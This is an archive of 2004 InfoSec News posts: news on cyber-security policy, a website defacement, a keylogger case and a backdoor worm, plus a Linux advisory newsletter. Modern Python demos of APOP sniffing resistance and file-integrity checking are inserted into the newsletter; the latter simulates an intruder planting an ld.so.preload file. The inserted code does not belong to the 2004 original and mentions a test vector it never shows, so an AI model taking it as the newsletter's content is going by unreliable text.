Date: Fri Dec 10 05:56:20 2004
Subject: [ISN] Cyber Security's Cassandra Syndrome
Message-ID:

http://www.technologyreview.com/articles/04/12/wo_hellweg121004.asp?p=1

By Eric Hellweg
December 10, 2004

The big news surrounding the passage of the Intelligence Reform Act this week was the creation of a new, top-level intelligence director position, which will oversee all aspects of intelligence gathering and dissemination in the U.S. government. But the technology community was calling foul at the elimination of another proposed high-level post. During last-minute, "mercurial" conference sessions, a provision that would have created an assistant secretary of cyber security within the Department of Homeland Security (DHS) was eliminated.

"The executive branch must exert more leadership" in this area, says a statement issued this week by the Cyber Security Industry Alliance, a Washington-based lobbying group.

Many hoped the post would help end the musical-chairs nature of the current cyber security director position, which has been a problem since the Bush administration took office in 2000. President George W. Bush appointed Richard C. Clarke to be the nation's first cyber security "Czar", but he resigned in frustration in February 2003. He was followed by Howard Schmidt, now the chief security officer at eBay, who also quit after two months. Most recently, the position was held by Amit Yoran, a former Symantec executive. But by then the position was a part of the DHS, and Yoran, reportedly frustrated by the lack of attention given to the issue, resigned in October after just one year.

No one doubts the necessity of protecting the nation's airports and infrastructure, but the topic doesn't require a senior-level post, say the Bush administration and the DHS, which requested the excision, according to Harris Miller, president of the Information Technology Association of America (ITAA).
"We're still examining respective options for reorganization," says Katie Mynster, a spokesperson for DHS. "[But] regarding that position specifically, we continue to believe that the integration of physical and cyber security within the Infrastructure Protection Directorate is the best method to protect the nation's infrastructure."

Security observers fear that with the elimination of the assistant secretary proposal, cyber security could slip further down the mindshare and budget priority list. Miller says that because the assistant secretary position is a political appointee-level post, requiring congressional approval hearings, it carries far more heft than the current staffing level. But there's a more practical consideration as well, Miller says. The assistant secretary position is two people removed from the president's ear, instead of the five that exist now.

"Unless you're a senior person, it's tough to meet other senior people. It's harder to get face time," says Miller. "Washington is all about clout, real and perceived."

Technology industry organizations on the Hill that opposed the position's elimination fear that without a senior-level person pushing for budgets and awareness, the nation risks a critical infrastructure attack, one that could cost multiple billions of dollars and possibly lives. Right now, much of the discussion around cyber security involves hackers shutting down websites and stealing personal information. But with networked sensors and software-based operations at our nation's power plants, petroleum refineries, and other critical locations, cyber-security proponents fear that someone might try to gain access to these points as part of a larger, coordinated attack with terrorism -- not hacker hijinx -- as a motive.

Further complicating the issue is the wide variance in security awareness among different industries and sectors.
The finance industry, for example, is very much attuned to the issue of cyber security, whereas the agriculture, energy, and education sectors either don't have the budget or don't think the topic is a problem. Proponents say government-led initiatives, shepherded by an assistant secretary-level position, could help educate industries and the public, and work to protect against cyber attacks.

"The message the Department of Homeland Security is sending is that cyber security just isn't that high of a priority," says Miller.

From isn at c4i.org Fri Dec 10 05:39:33 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 10 05:56:21 2004
Subject: [ISN] School's out to shun IE
Message-ID:

http://news.zdnet.com/2100-1009_22-5485834.html

By Jim Hu
CNET News.com
December 9, 2004

Citing security risks, a state university is urging students to drop Internet Explorer in favor of alternative Web browsers such as Firefox and Safari.

In a notice sent to students on Wednesday, Pennsylvania State University's Information Technology Services department recommended that students download other browsers to reduce attacks through vulnerabilities in the Microsoft software. The university said "media reports" and a string of warnings by Carnegie Mellon University's Computer Emergency and Response Team led to its recommendation.

"We're not telling people to wipe off IE, because you need IE to do operating-system updates," Robin Anderson, a spokeswoman for Penn State's ITS department, said in an interview. "We're telling (students) there are alternatives--and for them to strongly look at those."

Microsoft said Internet users have a choice in Web browsers, adding that the company has invested heavily in online security.

"While Internet Explorer is the choice of hundreds of millions because of the unique value it provides, we respect that some customers will choose an alternative," a Microsoft representative wrote in an e-mail statement.
Penn State's new policy highlights the many security vulnerabilities that have dogged IE over the past few months. Nearly two dozen holes in the Web browser have been discovered during the fall, ranging in degrees of seriousness.

Malicious code writers have targeted security holes in the browser to launch attacks or install spyware. These attacks are often launched when a victim clicks on a specific Web link, opening the door for criminals to take over the person's computer. Once the PC is compromised, the attacker could access account information, load other software and delete files.

Other attackers have targeted IE vulnerabilities to launch viruses. In November, security researchers discovered two viruses, Bofra.A and Bofra.B, loosely based on the MyDoom source code.

Security concerns have prompted a growing number of Internet users to embrace different browsers, such as The Mozilla Organization's Firefox, Apple Computer's Safari and Opera Software's Opera. While IE remains the undisputed leader for browsers, with nearly 90 percent market share, Firefox continues to gain in popularity. Firefox has surpassed the 5 million download mark while gaining 5 percentage points in May to 7.4 percent, according to research firm OneStat.com. Microsoft has disputed these numbers, claiming that they do not represent corporate users.

Even though attackers target IE because of its near ubiquity, malicious code writers are widening their reach. Yesterday, a security company discovered an exploit in a feature common to most browsers, including IE, Firefox, Opera and Safari, that could be used to launch an attack.

Penn State's Anderson said the university has just completed a two-month information campaign for PC security, urging students to download firewalls and antivirus software, and to regularly install operating-system updates. She added that changing browsers is one of many ways to defend against attackers.
"What we're saying is, we're taking a hard stance on securing our computers," Anderson said.

CNET News.com's Robert Lemos contributed to this report.

From isn at c4i.org Fri Dec 10 05:39:48 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 10 05:56:23 2004
Subject: [ISN] Japan to step up defenses against Islamic, NKorean, computer threats
Message-ID:

Forwarded from: William Knowles

http://www.spacedaily.com/2004/041208055632.1zik2pci.html

Dec 08, 2004 - (AFP)

TOKYO - Japan will set up a special unit against cyber terrorism and needs to be on guard against threats from Islamic militants and North Korean agents, police said Wednesday.

The government will set up a new anti-cyberterrorism team of about 30 computer experts by April, with the number of personnel to be doubled two years later, said an official with the IT Security Office of the Cabinet Office.

"Various acts of terrorism and attacks are on the rise, and the government has decided we can do more to deal with them," the official said.

The National Police Agency said separately that Japan, a close ally of the United States, needed to be cautious about threats from Islamic extremists and North Korea.

Militants purported to belong to Al-Qaeda have threatened to attack Tokyo to protest Japan's troop deployment to Iraq. North Korea during the Cold War kidnapped Japanese citizens to train spies in Japanese language and culture, a saga that continues to keep relations tense between the two countries.

In an annual review and outlook of public security released Tuesday, the police cited the case of Lionel Dumont, a Frenchman linked to Al-Qaeda who stayed in Japan with several foreign associates after the September 11, 2001 attacks in the United States.

"Concerns remain that extremists might manipulate the Islamic communities (in Japan) to carry out terror-related activities," the report said.
At most 10,000 Japanese are estimated to be Muslims, mostly women who converted after marrying foreigners, but Japan is home to many more expatriate Muslims.

On North Korea, the police report said the Stalinist nation has widened the gap with the rest of the world with its nuclear ambition.

"In order to secure economic aid from Japan, (North Korea) might increase harmful operations and activities," the report said.

*==============================================================*
"Communications without intelligence is noise; Intelligence without communications is irrelevant."
Gen Alfred. M. Gray, USMC
----------------------------------------------------------------
C4I.org - Computer Security, & Intelligence - http://www.c4i.org
*==============================================================*

From isn at c4i.org Fri Dec 10 05:43:57 2004
From: isn at c4i.org (InfoSec News)
Date: Fri Dec 10 05:56:26 2004
Subject: [ISN] Hacker Gets 16 Months In Prison
Message-ID:

http://www.nbcsandiego.com/news/3987070/detail.html

December 9, 2004

SAN DIEGO -- An Arizona man who hacked into business computer e-mail systems, then stole mortgage refinance leads that he resold for personal profit, was sentenced Thursday to 16 months in state prison.

Anthony Todd Banasack, 38, pleaded guilty last month to a felony charge of accessing a computer to take data. Banasack was sentenced by Superior Court Judge Robert Trentacosta.

"The defendant victimized companies or individuals over a two- to three-year period using keystroke logging software that had been secretly installed on computers from a remote location," said District Attorney Bonnie Dumanis.

In May, a San Diego company detected keystroke logging software, in which everything typed on its computer keyboards could be replicated off site by the hacker.

The district attorney's Computer and Technology Crime High Tech Response Team and a sheriff's detective identified Banasack, who lived in Tempe, Ariz., as the suspect, authorities said.
Subsequent investigation by the CATCH Team determined that Banasack had victimized eight corporations in California, authorities said. More than 6,000 data files stolen from victims' computers were recovered from Banasack's computers, investigators said.

From isn at c4i.org Mon Dec 13 04:53:08 2004
From: isn at c4i.org (InfoSec News)
Date: Mon Dec 13 05:13:39 2004
Subject: [ISN] Hackers deface county Web site
Message-ID:

http://www.themonitor.com/SiteProcessor.cfm?Template=/GlobalTemplates/Details.cfm&StoryID=4697&Section=Local

December 11, 2004
Alma Walzer
The Monitor

EDINBURG - The official Hidalgo County Web site fell victim last weekend to an international computer hacking group known by the names of Dead_c0 de and Kernel_Attack, believed to be based in Brazil.

The hackers defaced the county's main page on or about Dec. 5 and posted an obscene message directed at President George W. Bush, Osama bin Laden, Saddam Hussein and the United States of America. Using Portuguese and English, the group said "we are not kiddies, nor are we nerds, much less hackers," according to the message on the Web site's main page. "Kernel_Attack ownZ you."

It is not known exactly how long the message remained on the county Web site, said county information technology director Renan Ramirez.

"Once we noticed it on Sunday night, about 10 p.m., we fixed it right away," Ramirez said. "They creamed the main page and replaced it with a 'You've been hacked' page."

"It didn't affect functionality, all we had to do was repair the main page," Ramirez said. "By Monday morning, we were already posting jobs and we really didn't even consider it a very big deal until we read the message and realized it slandered the president."

The county's Web site doesn't have transactional capabilities, therefore, there was no real threat to data, Ramirez said.

"We have hack attacks all the time," Ramirez said.
"The Web site allows the public to view the county phone directory, job postings, the commissioners court agenda and provides links to related sites. No county data was compromised."

Hidalgo County is not alone. A similar message appeared Friday on a Texas Southern University Web site. The Department of Transportation Studies at TSU, located in Houston, bore the same message without the obscenities to Bush, bin Laden, Hussein and the United States.

A news service in the Philippines reported that the Philippine Airlines Web site was hacked by a group that left the same signature line "Kernel_Attack ownZ you" in November. The site used by air travelers to reserve flights with their credit cards was crippled for days.

Ramirez said he's required by county policy to report the issue to the proper authorities. The proper authorities include the FBI and the Secret Service.

Rosalie Savage, spokeswoman for the McAllen bureau of the FBI, said she personally wasn't familiar with Dead_C0 de or Kernel_Attack. The FBI's San Antonio office has a cyber crime squad that would investigate the situation, Savage said.

"If it's valid information then FBI would look at it - and the Secret Service as well, not just us," Savage said.

Meanwhile, Ramirez is working hard to make sure the Web site isn't compromised again.

"We got approval on some requested equipment for next year," Ramirez said. "We are specifically targeting these threats and getting some detection equipment and a secondary firewall, and we're changing the service provider.

"There are five or six different steps we're taking to prevent this from happening again," Ramirez said.

Ramirez could have his work cut out for him, as no system is ever considered 100 percent secure.

"Nothing is perfect," said Martin Streicher, editor in chief of Linux Magazine. Linux is a computer operating system similar to Windows. The hacker's message made a reference to Linuxmail.org.
"There are varying levels of vulnerability depending on what kind of computer you use - it's more of a software problem, but there are some hardware problems as well."

Streicher pointed to previous cases of "war driving" in San Francisco, Calif., where individuals drive around with laptops and wireless internet access, looking for systems which are unsecure.

"Effectively, they open the door to anyone who wants to come in," Streicher said.

"There are tons of well-known vulnerabilities in Windows. Your Web server alone lets them know what your system is vulnerable to," Streicher said.

From isn at c4i.org Mon Dec 13 04:53:34 2004
From: isn at c4i.org (InfoSec News)
Date: Mon Dec 13 05:13:41 2004
Subject: [ISN] Information security: a legal perspective
Message-ID:

http://www.financialexpress.com/fe_full_story.php?content_id=76698

PAVAN DUGGAL
December 13, 2004

Security is one of the biggest concerns that affects the world today, not only in the actual world but in the context of the electronic format and the information stored therein. There is an increasing emphasis on legal issues concerning information security.

India enacted its first cyber law, namely the Information Technology Act, 2000, which came into force on October 17, 2000. A perusal of the preamble of the same clearly shows that this is not a law dedicated to security. However, one of the main objectives of the IT Act, 2000 is to provide legal recognition for "electronic commerce", which involves the use of alternatives to paper-based methods of communication and storage of information. Security is thus covered in some measure under the IT Act, 2000.

The definitional clause of the Indian cyber laws does not define security. However, it defines secure system and security procedure and a secure electronic record. The Indian cyber law also details secure digital signatures. It makes breach of security an act that attracts consequences of civil liability.
If a person without the permission of the owner or any other person in charge of a computer, computer system or computer network, accesses or secures access to the same, he will be liable to pay statutory damages by way of compensation, not exceeding Rs 1 crore. Thus, merely gaining access to such a computer or system by breaching or violating the security processes or mechanisms is enough to attract civil liability.

Breach of security is also implicitly recognised as a penal offence, as hacking is punishable under Section 66 of the IT Act, 2000 with three years imprisonment and a fine of Rs 2 lakh. The appropriate government has been given the discretion to declare any computer as a protected system. Any person who secures access or attempts to secure access to a protected system in contravention of the provisions of the law shall be punished with imprisonment of either description for a term which may extend to ten years and shall be liable to fine.

As per amendments made in the Indian Evidence Act, 1872 by the IT Act, in any proceedings involving a secure electronic record, the court shall presume, unless the contrary is proved, that the secure electronic record has not been altered since the specific point of time to which the secure status relates. Also, in any proceedings involving secure digital signatures, the court shall presume, unless the contrary is proved, that the secure digital signature is affixed by the subscriber with the intention of signing or approving the electronic record.

Some issues of security relating to certifying authorities have been specified in the IT (Certifying Authorities) Rules, 2000 and the IT security guidelines. These guidelines are pretty exhaustive and detail different aspects of physical and operational security and information management, including sensitive information security, system integrity and security measures.
In conclusion, I am of the opinion that the legal issues relating to security are likely to develop over a period of time as the law on security of information and networks evolves to keep pace with the developments on the technological front. It is the responsibility of each computer user to ensure that the security of computers, computer systems and computer networks is preserved and not violated. Only in preservation of security of the same lies the path of progress and prosperity.

The author is a Supreme Court advocate and cyber law consultant. He can be reached at pduggal@nde.vsnl.net.in and pavanduggal@hotmail.com.

From isn at c4i.org Mon Dec 13 04:54:51 2004
From: isn at c4i.org (InfoSec News)
Date: Mon Dec 13 05:13:43 2004
Subject: [ISN] DOD organizes network command
Message-ID:

Forwarded from: William Knowles

http://www.fcw.com/fcw/articles/2004/1206/web-dod-12-10-04.asp

By Frank Tiboni
Dec. 10, 2004

The nation's top cyberwarrior announced today that officials formed a new command structure to better operate and protect the military's computer networks.

"It's commanders working with commanders," said Air Force Lt. Gen. Harry Raduege, commander of the task force. He spoke today at a luncheon sponsored by the Northern Virginia chapter of AFCEA International.

Defense Department officials approved Nov. 19 the Global Information Grid Network Operations and Defense plan that identifies four officials in the military services that will report to the commander of the Joint Task Force-Global Network Operations.

The military services' commanders who will work with Raduege to achieve a better structure and discipline for operation and protection of the military's networks include Army Lt. Gen. Larry Dodgen, commanding general of Army Space and Missile Defense Command; Air Force Lt. Gen. Bruce Carlson, the service's component commander to Strategic Command; Navy Vice Adm. James McArthur Jr., commander of Naval Network Warfare Command; and Marine Corps Col.
Robert Baker, the Marines' chief information officer.

DOD Secretary Donald Rumsfeld created the task force in June and named the director of the Defense Information Systems Agency to oversee it to achieve a more cohesive operation and protection of the military's networks. Raduege started serving as the agency's director in 2000 and this week agreed to oversee it for two more years.

Raduege needed a command structure to better operate and protect the military's networks because they increasingly come under attack. He said task force officials reported 62,810 attempted intrusions to date this year, up from 54,488 in 2003. Raduege also revealed that military networks were hacked 294 times in 2003. He said military employees could prevent 90 percent of the attacks if they practice better computer security, to include using unique passwords and heeding advice from the military's information assurance bulletins.

The task force falls under Strategic Command, one of the military's nine unified combatant commands that either oversee use of combat forces in a geographic region or provide a capability and develop doctrine for them. Strategic Command oversees the operation and protection of the military's networks and information operations, to include psychological operations and perhaps computer network attack.

*==============================================================*
"Communications without intelligence is noise; Intelligence without communications is irrelevant."
Gen Alfred. M.
Gray, USMC
----------------------------------------------------------------
C4I.org - Computer Security, & Intelligence - http://www.c4i.org
*==============================================================*

From isn at c4i.org Mon Dec 13 04:56:33 2004
From: isn at c4i.org (InfoSec News)
Date: Mon Dec 13 05:13:45 2004
Subject: [ISN] 'Playboy' Virus Dropping Dangerous Backdoor
Message-ID:

http://www.eweek.com/article2/0,1759,1738912,00.asp

By Ryan Naraine
December 10, 2004

Anti-virus vendors have raised the alarm for a new mass-mailing worm with a dangerous backdoor component.

The worm, called W32.Maslan.C@mm, arrives as an attachment promising naked photos of Playboy models but, if executed, drops an IRC (Internet Relay Chat) bot capable of transmitting passwords and sensitive information back to the virus writer.

According to an alert from McAfee, the backdoor is powerful enough to terminate the processes of various anti-virus security applications.

The worm also spreads itself via poorly secured network shares and weak passwords and takes advantage of two known exploits -- LSASS and RPC-DCOM -- affecting Microsoft Windows users. Patches for both exploits have been available for some time, but unpatched machines are vulnerable to worm infection.

According to Sophos, Maslan-C copies itself to the Windows system folder and creates a number of other files on the computer which make up the components of the worm. It constructs messages using its own SMTP engine and harvests target e-mail addresses from the victim's machine.

The worm uses several masking techniques including spoofed sender addresses and has been programmed to monitor Internet Explorer browser sessions to capture data relating to various financial sites.

An advisory from Symantec rates the risk as low, but distribution remains high.

The use of naked celebrity images as a virus infection tactic is nothing new.
In the past, virus writers have attached the names of celebrities such as Anna Kournikova, Britney Spears and Halle Berry to mass-mailing worms.

From isn at c4i.org Mon Dec 13 04:57:18 2004
From: isn at c4i.org (InfoSec News)
Date: Mon Dec 13 05:13:47 2004
Subject: [ISN] Linux Advisory Watch - December 10th 2004
Message-ID:

+---------------------------------------------------------------------+
|  LinuxSecurity.com                          Weekly Newsletter       |
|  December 10th, 2004                        Volume 5, Number 49a    |
+---------------------------------------------------------------------+

Editors:  Dave Wreski                Benjamin D. Thomas
          dave@linuxsecurity.com     ben@linuxsecurity.com

Linux Advisory Watch is a comprehensive newsletter that outlines the security vulnerabilities that have been announced throughout the week. It includes pointers to updated packages and descriptions of each vulnerability.

This week, advisories were released for hpsockd, viewvcs, nfs-util, cyrus-imapd, netatalk, gaim, rhpl, ttfonts, mc, udev, gnome-bluetooth, rsh, mysql, libpng, glib, gtk, postgresql, shadow-utils, perl, mirrorselect, drakxtools, dietlibc, gzip, rp-pppoe, openssl, ImageMagick, samba, and cups. The distributors include Debian, Fedora, Gentoo, Mandrake, Red Hat, SuSE, Trustix, and Turbo Linux.

----

Internet Productivity Suite: Open Source Security

Trust Internet Productivity Suite's open source architecture to give you the best security and productivity applications available. Collaborating with thousands of developers, Guardian Digital security engineers implement the most technologically advanced ideas and methods into their design.

http://store.guardiandigital.com/html/eng/products/software/ips_overview.shtml

---

Packet Sniffers

One of the most common ways intruders gain access to more systems on your network is by employing a packet sniffer on an already compromised host. This "sniffer" just listens on the Ethernet port for things like passwd and login and su in the packet stream and then logs the traffic after that.
This way, attackers gain passwords for systems they are not even attempting to break into. Clear-text passwords are very vulnerable to this attack.

Example: Host A has been compromised. Attacker installs a sniffer. Sniffer picks up admin logging into Host B from Host C. It gets the admin's personal password as they log in to B. Then, the admin does a su to fix a problem. They now have the root password for Host B. Later the admin lets someone telnet from his account to Host Z on another site. Now the attacker has a password/login on Host Z.

In this day and age, the attacker doesn't even need to compromise a system to do this: they could also bring a laptop or PC into a building and tap into your net.

Using ssh or other encrypted password methods thwarts this attack. Things like APOP for POP accounts also prevent this attack. (Normal POP logins are very vulnerable to this, as is anything that sends clear-text passwords over the network.)

Excerpt from LinuxSecurity HowTO: http://www.linuxsecurity.com/docs/LDP/Security-HOWTO/
By: Dave Wreski (dave@linuxsecurity.com) & Kevin Fenzi

-----

Mass deploying Osiris

Osiris is a centralized file-integrity program that uses a client/server architecture to check for changes on a system. A central server maintains the file-integrity database and configuration for a client and, at a specified time, sends the configuration file over to the client, runs a scan and sends the results back to the server to compare any changes. Those changes are then sent via email, if configured, to a system admin or group of people. The communication is all done over an encrypted communication channel.

http://www.linuxsecurity.com/content/view/101884/49/

---------------------------------------------------------------------

AIDE and CHKROOTKIT

Network security is continuing to be a big problem for companies and home users. The problem can be resolved with an accurate security analysis.
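The Packet Sniffers excerpt above says that a passive listener on the segment harvests any clear-text password, and that APOP avoids this for POP. Here is that difference made concrete in Python, as an added example that is not code from the newsletter, the Security HOWTO or any real POP server: it simulates a plain USER/PASS login and an APOP login side by side, recording every line that would cross the wire, and checks which of the two lets the password be read from the capture. The user name, password, host name and `USERS` table are constructed for the demo; the single known-answer vector in the usage note comes from RFC 1939 section 7.

```python
"""APOP (RFC 1939) challenge-response versus clear-text USER/PASS.

Constructed simulation: nothing touches the network. Each function appends
the lines an eavesdropper on the segment would see to the `wire` list, so the
capture can be inspected afterwards.
"""
import hashlib
import hmac
import itertools
import os
import time

# Constructed credential store standing in for the server's password file.
# APOP requires the server to keep the clear-text password: a real trade-off.
USERS = {"alice": "correct horse battery staple"}

_conn_counter = itertools.count(1)  # guarantees a fresh banner per connection


def apop_banner(hostname="pop.example.test"):
    """Server greeting timestamp in the <pid.clock@host> form, unique per session."""
    return f"<{os.getpid()}.{time.time_ns()}{next(_conn_counter)}@{hostname}>"


def apop_digest(banner, password):
    """Client side: MD5 over banner followed by the shared secret, lowercase hex."""
    return hashlib.md5((banner + password).encode("utf-8")).hexdigest()


def apop_verify(username, banner, digest):
    """Server side: recompute the digest from the stored secret and compare."""
    secret = USERS.get(username)
    if secret is None:
        return False
    return hmac.compare_digest(apop_digest(banner, secret), digest)


def apop_login(username, password, wire):
    """One APOP exchange; returns True when the server accepts it."""
    banner = apop_banner()
    wire.append(f"S: +OK POP3 server ready {banner}")
    digest = apop_digest(banner, password)
    wire.append(f"C: APOP {username} {digest}")
    ok = apop_verify(username, banner, digest)
    wire.append("S: +OK maildrop locked and ready" if ok else "S: -ERR permission denied")
    return ok


def plain_login(username, password, wire):
    """Ordinary USER/PASS login for contrast: the secret itself is on the wire."""
    wire.append("S: +OK POP3 server ready")
    wire.append(f"C: USER {username}")
    wire.append("S: +OK")
    wire.append(f"C: PASS {password}")
    ok = USERS.get(username) == password
    wire.append("S: +OK maildrop locked and ready" if ok else "S: -ERR permission denied")
    return ok


def password_visible(wire, password):
    """What the sniffer gets: does the secret appear verbatim in the capture?"""
    return any(password in line for line in wire)


def replay_captured_digest(username, password):
    """A digest sniffed from one session is useless in the next: the banner changes."""
    first_banner = apop_banner()
    captured = apop_digest(first_banner, password)   # what the sniffer recorded
    second_banner = apop_banner()                    # new session, new challenge
    return apop_verify(username, second_banner, captured)


if __name__ == "__main__":
    for login in (plain_login, apop_login):
        capture = []
        login("alice", USERS["alice"], capture)
        print(login.__name__, "password on the wire:", password_visible(capture, USERS["alice"]))
        print("\n".join("   " + line for line in capture))
```

The capture from `plain_login` contains the `PASS` line verbatim; the capture from `apop_login` contains only a one-time banner and a digest, and `replay_captured_digest` shows that the digest cannot be reused against a later session. The caveat the HOWTO's wording skips over: APOP protects only the password. The mailbox contents still cross the wire in the clear, and the server has to hold the clear-text secret, which is why ssh (or TLS) for the whole session is the stronger answer.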
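The Osiris blurb above and the AIDE item that follows both describe the same core mechanism: record a baseline of every file (hash, size, mode), re-scan later, report what was added, removed or changed, and keep the baseline somewhere the intruder cannot quietly rewrite it. This Python block implements that loop as an added example; it is not code from Osiris, AIDE or chkrootkit. The directory layout, file contents and the HMAC key are constructed for the demo; in the Osiris model the key and the sealed baseline would live on the central server, not on the scanned host.

```python
"""Minimal file-integrity scan in the style of Osiris/AIDE (constructed example).

build_baseline() walks a tree and records sha256/size/mode per regular file;
compare() diffs two scans; seal()/unseal() wrap the stored baseline in an HMAC
so a tampered integrity database is refused rather than trusted.
"""
import hashlib
import hmac
import json
import os
import tempfile

HASH_CHUNK = 1 << 16


def file_digest(path):
    """sha256 of a file's contents, read in chunks so large binaries are fine."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(HASH_CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root):
    """Record (sha256, size, mode) for every regular file under root, keyed by relative path."""
    entries = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # symlinks and special files are out of scope for this demo
            st = os.lstat(full)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            entries[rel] = {"sha256": file_digest(full), "size": st.st_size,
                            "mode": st.st_mode & 0o7777}
    return entries


def compare(baseline, current):
    """Report files added, removed, or changed (any recorded attribute differs)."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    changed = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "changed": changed}


def seal(baseline, key):
    """Serialise the baseline and compute an HMAC tag over the bytes."""
    body = json.dumps(baseline, sort_keys=True).encode("utf-8")
    return body, hmac.new(key, body, hashlib.sha256).hexdigest()


def unseal(body, tag, key):
    """Return the baseline only if the tag verifies; a rewritten database is refused."""
    if not hmac.compare_digest(hmac.new(key, body, hashlib.sha256).hexdigest(), tag):
        raise ValueError("baseline database failed integrity check")
    return json.loads(body.decode("utf-8"))


def demo():
    """Constructed scenario: baseline, simulate an intrusion, re-scan, and try tampering."""
    key = b"constructed-demo-key"  # held off-host by the central server in practice
    with tempfile.TemporaryDirectory() as root:
        seed = {
            "etc/passwd": b"root:x:0:0::/root:/bin/sh\n",
            "etc/motd": b"welcome\n",
            "bin/ls": b"#!/bin/sh\nexec /usr/bin/ls \"$@\"\n",
        }
        for rel, data in seed.items():
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as fh:
                fh.write(data)
        body, tag = seal(build_baseline(root), key)

        # Simulated intrusion: binary altered, preload file dropped, motd removed.
        with open(os.path.join(root, "bin", "ls"), "ab") as fh:
            fh.write(b"# appended by intruder (constructed)\n")
        with open(os.path.join(root, "etc", "ld.so.preload"), "wb") as fh:
            fh.write(b"/lib/constructed-example.so\n")
        os.remove(os.path.join(root, "etc", "motd"))

        report = compare(unseal(body, tag, key), build_baseline(root))

        # An intruder who edits the stored database without the key is caught.
        try:
            unseal(body + b" ", tag, key)
            tamper_detected = False
        except ValueError:
            tamper_detected = True
    return report, tamper_detected


if __name__ == "__main__":
    result, tampered = demo()
    print(json.dumps(result, indent=2))
    print("tampered database refused:", tampered)
```

Real tools record more attributes (owner, inode, link count, timestamps) and keep exclusion lists for files that legitimately churn (logs, spool directories); the structure of the loop is the same. The point the Osiris text makes about the database living on the server is what `seal`/`unseal` stand in for: hashing alone tells you a file changed, but only a baseline the intruder cannot rewrite tells you the report itself is trustworthy.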
In this article I show how to approach security using aide and chkrootkit.

http://www.linuxsecurity.com/content/view/101882/49/

------

--> Take advantage of the LinuxSecurity.com Quick Reference Card!
--> http://www.linuxsecurity.com/docs/QuickRefCard.pdf

+---------------------------------+
|  Distribution: Debian           | ----------------------------//
+---------------------------------+

* Debian: hpsockd denial of service fix
3rd, December, 2004

"infamous41md" discovered a buffer overflow condition in hpsockd, the socks server written at Hewlett-Packard. An exploit could cause the program to crash or may have worse effect.

http://www.linuxsecurity.com/content/view/117313

* Debian: viewcvs information leak fix
6th, December, 2004

Hajvan Sehic discovered several vulnerabilities in viewcvs, a utility for viewing CVS and Subversion repositories via HTTP. When exporting a repository as a tar archive the hide_cvsroot and forbidden settings were not honoured enough.

http://www.linuxsecurity.com/content/view/117392

* Debian: nfs-util denial of service fix
8th, December, 2004

SGI has discovered that rpc.statd from the nfs-utils package, the Network Status Monitor, did not ignore the "SIGPIPE". Hence, a client prematurely terminating the TCP connection could also terminate the server process.

http://www.linuxsecurity.com/content/view/117423

+---------------------------------+
|  Distribution: Fedora           | ----------------------------//
+---------------------------------+

* Fedora: cyrus-imapd-2.2.10-3.fc2 update
3rd, December, 2004

The recent update to cyrus-imapd-2.2.10-1.fc2 for security exploits revealed a package installation problem.

http://www.linuxsecurity.com/content/view/117366

* Fedora: cyrus-imapd-2.2.10-3.fc3 update
3rd, December, 2004

The recent update to cyrus-imapd-2.2.10-1.fc3 for security exploits revealed a package installation problem.
If the main configuration files for cyrus-imapd

http://www.linuxsecurity.com/content/view/117367

* Fedora: netatalk-1.6.4-2.2 update
6th, December, 2004

Fix to temp file vulnerability in /etc/psf/etc2ps

http://www.linuxsecurity.com/content/view/117395

* Fedora: netatalk-1.6.4-4 update
6th, December, 2004

Fix temp file vulnerability in /etc/psf/etc2ps

http://www.linuxsecurity.com/content/view/117396

* Fedora: gaim-1.1.0-0.FC2 update
6th, December, 2004

Gaim allows you to talk to anyone using a variety of messaging protocols, including AIM (Oscar and TOC), ICQ, IRC, Yahoo!, MSN Messenger, Jabber, Gadu-Gadu, Napster, and Zephyr. These protocols are implemented using a modular, easy to use design. To use a protocol, just add an account using the account editor.

http://www.linuxsecurity.com/content/view/117397

* Fedora: gaim-1.1.0-0.FC3 update
6th, December, 2004

Gaim allows you to talk to anyone using a variety of messaging protocols, including AIM (Oscar and TOC), ICQ, IRC, Yahoo!, MSN Messenger, Jabber, Gadu-Gadu, Napster, and Zephyr. These protocols are implemented using a modular, easy to use design. To use a protocol, just add an account using the account editor.

http://www.linuxsecurity.com/content/view/117398

* Fedora: rhpl-0.148.1-2 update
6th, December, 2004

Remove synaptics requires (#137935)

http://www.linuxsecurity.com/content/view/117399

* Fedora: ttfonts-ja-1.2-36.FC3.0 update
7th, December, 2004

reverted the previous changes so that it broke ghostscript working. (#139798)

http://www.linuxsecurity.com/content/view/117404

* Fedora: mc-4.6.1-0.11FC3 update
7th, December, 2004

The updated version of Midnight Commander contains finished CAN-2004-0494 security fixes in extfs scripts and has better support for UTF-8, contains subshell prompt fixes and enhanced large file support.

http://www.linuxsecurity.com/content/view/117417

* Fedora: udev-039-10.FC3.4 update
7th, December, 2004

udev is an implementation of devfs in userspace using sysfs and /sbin/hotplug.
It requires a 2.6 kernel to run properly.

http://www.linuxsecurity.com/content/view/117418

* Fedora: udev-039-10.FC3.5 update
7th, December, 2004

fixed udev.rules for cdrom symlinks (bug 141897)

http://www.linuxsecurity.com/content/view/117419

* Fedora: gnome-bluetooth-0.5.1-5.FC3.1 update
7th, December, 2004

fixed again gnome-bluetooth-manager script for 64bit (bug 134864)

http://www.linuxsecurity.com/content/view/117420

* Fedora: rsh update
8th, December, 2004

fixed rexec fails with "Invalid Argument" (#118630)

http://www.linuxsecurity.com/content/view/117432

* Fedora: Omni-0.9.2-1.1 update
8th, December, 2004

This is the 0.9.2 release of the Omni printer driver collection. It also fixes a library path problem on multilib architectures such as x86_64.

http://www.linuxsecurity.com/content/view/117433

* Fedora: mysql-3.23.58-9.1 update
8th, December, 2004

fix security issues CAN-2004-0835, CAN-2004-0836, CAN-2004-0837 (bugs #135372, 135375, 135387)

http://www.linuxsecurity.com/content/view/117434

* Fedora: libpng-1.2.8-1.fc2 update
9th, December, 2004

Updates libpng to the current release 1.2.8. For details about the bugs which have been fixed in this release, see http://www.libpng.org/pub/png/libpng.html

